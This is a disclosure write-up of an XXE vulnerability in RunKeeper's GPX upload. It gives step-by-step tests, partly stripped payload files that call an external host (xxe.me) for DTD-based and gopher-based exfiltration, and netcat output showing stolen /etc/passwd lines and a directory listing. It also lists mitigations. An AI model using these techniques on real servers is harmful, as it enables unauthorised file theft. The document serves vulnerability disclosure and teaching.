Identifying Xml eXternal Entity vulnerability (XXE) (original) (raw)

Here is a small writeup on how a XXE was discover on the website RunKeeper.com. The website, as the name suggest, keep track of your trainings (running, cycling, skying, etc.) The vulnerabilities presented were fixed on June 10th 2014.

The website accept the upload of GPX file. The GPX file format is a XML document containing a list of positions with the instant speed, time and elevation.

GPX file

Here is an example of GPS file in the GPX format. The only important aspect is that it is XML based.

2014-06-07T20:04:44.453Z

    22.600000
    2014-06-07T18:06:16Z
    0.000000
  
  
    22.600000
    2014-06-07T18:06:16Z
    0.000000
  
  [...]

Attack potential

When seeing user XML being parse server-side, the first thing that come to mind should be XXE attacks. XXE stands for Xml eXternal Entity. These attacks have gain momentum recently following various publications.

Note that the current article doesn't explain in dept XXE. It focus on tips and methodology to identify the vulnerability and the parser capabilities. The tests presented are those that were effective on the old version of RunKeeper.

Step 1 : Confirmation that entities are interpreted

In our first attempt, we need to confirm that entity are interpreted in there most basic form. We replace value with an inline entity. If it loads properly, then the replacement must have occurs.

]>

2014-06-07T20:04:44.453Z

    22.600000
    2014-06-07T18:06:16Z
    0.000000
  

Step 2 : Confirmation that SYSTEM entities are usable

We can now try loading external resources from a host we control. The resources can be hosted on a HTTP server, FTP server or even Samba shares in the case of intranet application.

RunKeeper only look at position, time and other numeric values. The string values from the metadata are not used. Therefore, it is not possible to get a direct response after the upload of a GPX file.

If the destination is a server we control, we would receive a connection if external entities are activated. Assuming a strict firewall restrictions is in place, all common ports should be tested (23, 80, 443, 8080, ...).

evil.gpx

]>

&xxe; 2014-06-07T20:04:44.453Z

    22.600000
    2014-06-07T18:06:16Z
    0.000000

Right after the upload, our server receive the following request. SYSTEM entities are now confirm.

74.50.53.234 - - [08/Jun/2014:00:36:55 -0400] "GET /ping_me HTTP/1.1" 200 77 "-" "Java/1.6.0_26"

Step 3 : Test for external DTD availability to exfiltrate data

A cool trick was discovered by the researchers Alexey Osipov and Timur Yunusov that allow the construction of URL with data coming from other entities.

evil1.gpx

%dtd;]>

&send; [....]

http://xxe.me/evil1.dtd

"> %all;

Following the upload, we then received the following request:

74.50.62.56 - - [08/Jun/2014:00:51:41 -0400] "GET /content?Debian GNU/Linux 7 \x5Cn \x5Cl HTTP/1.1" 200 251 "-" "Java/1.6.0_26"

In pratice, the previoust technique is not perfect. Any file with XML incompatible characters (&, \n, \x80, etc) would break the URL. The /etc/issue is one of the rare file safe to include.

Step 4 : Test for external DTD with gopher protocol

We still have an option to fetch arbitrary file. A good observer would have notice that the remote JVM version was capture on step 1. The version is Java 1.6 update 26. The gopher protocol was disable on version 1.6 update 37 [Ref].The gopher protocol can be use to open a TCP connection and

send arbitrary data

.

gopher://remote_host:remote_port/?ARBITRARY_DATA

evil2.gpx

%dtd;]>

&send; [....]

http://xxe.me/evil2.dtd

"> %all;

Following the upload of the first file, an incoming connection is open and the file content is received.

$ nc -nlvk 1337 Listening on [0.0.0.0] (family 0, port 1337) Connection from [74.50.53.234] port 1337 [tcp/*] accepted (family 2, sport 42321) xe?root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh [...]

Files can be fetch and directory can be list. For example, the entity "file:///" will return the root directory:

$ nc -nlvk 1337 Listening on [0.0.0.0] (family 0, port 1337) Connection from [74.50.58.179] port 1337 [tcp/*] accepted (family 2, sport 52827) xe?.rpmdb .ssh bin boot dev etc home initrd.img lib lib32 lib64 lost+found media mnt opt proc root sbin selinux [...]

Demonstration

Demonstration of the attacks described previously. (Fullscreen recommended)

Mitigations

To resolve this issue two changes needed to be applied. SYSTEM entities were disable for the parsing of GPX files. Also, the Java Virtual Machine was updated to benefit from the previous security updates including the gopher protocol being disable by default.

References